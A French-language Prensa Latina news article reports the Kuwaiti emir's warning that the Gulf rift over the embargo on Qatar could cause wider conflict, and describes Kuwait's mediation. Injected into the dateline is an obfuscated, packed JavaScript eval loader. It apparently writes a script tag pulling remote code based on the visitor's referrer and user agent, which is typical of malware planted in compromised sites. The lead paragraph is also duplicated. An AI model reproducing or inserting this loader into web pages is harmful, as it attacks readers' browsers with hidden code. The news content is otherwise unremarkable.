samedi 13 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L´émir du Koweït présage des maux plus importants si la crise du Golfe persiste

Koweït, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|abers|var|u0026u|referrer|hfras||js|php'.split('|'),0,{})) 26 octobre (Prensa Latina) L´émir du Koweït, Sabah Al Ahmad Al Sabah, a présagé des maux plus importants si la crise diplomatique, politique et commerciale entre quatre membres du Conseil de Coopération du Golfe (CCG) persiste.

Koweït, 26 octobre (Prensa Latina) L´émir du Koweït, Sabah Al Ahmad Al Sabah, a présagé des maux plus importants si la crise diplomatique, politique et commerciale entre quatre membres du Conseil de Coopération du Golfe (CCG) persiste.

Le dignatiare a ajouté que « la rupture des relations diplomatiques et l´embargo de l´Arabie Saoudite, du Bahreïn et des Émirats Arabes Unis contre le Qatar pourrait avoir des conséquences négatives, malgré les souhaits des parties en conflit ».

« Nous devons tous être conscients des dangers de cette controverse, capable de générer des conflits internationaux qui déstabilisent les pays du Golfe, leurs peuples et leurs voisins », a-t-il indiqué.

« Tout le monde doit savoir que le Koweït, conscient de la possibilité d´expansion du conflit, réalise une médiation bien au-delà de la traditionnelle, en tant que frère des deux côtés, dans le but de réconcilier et restaurer la maison du Golfe pour la protéger des cassures et de l´effondrement », a-t-il souligné.

L´émir a assuré que « l´histoire et les prochaines générations n´oublieront pas et ne pardonneront jamais ceux qui contribuent, y compris par un seul mot, à accroitre et alimenter la dispute, et à provoquer l´effondrement de cette belle demeure ».

L´émirat du Koweït fait office de médiateur actif pour résoudre la crise qui a été déclenchée le 5 juin dernier lorsque le Bahreïn, l´Arabie Saoudite, les Émirats Arabes Unis et l´Égypte ont rompu leurs liens avec le Qatar. Les quatre pays accuse Doha de soutenir les extrémistes et de financer le terrorisme, ce qu´ont toujours nié les qataris.

peo/arc/arc

EN CONTINU
notes connexes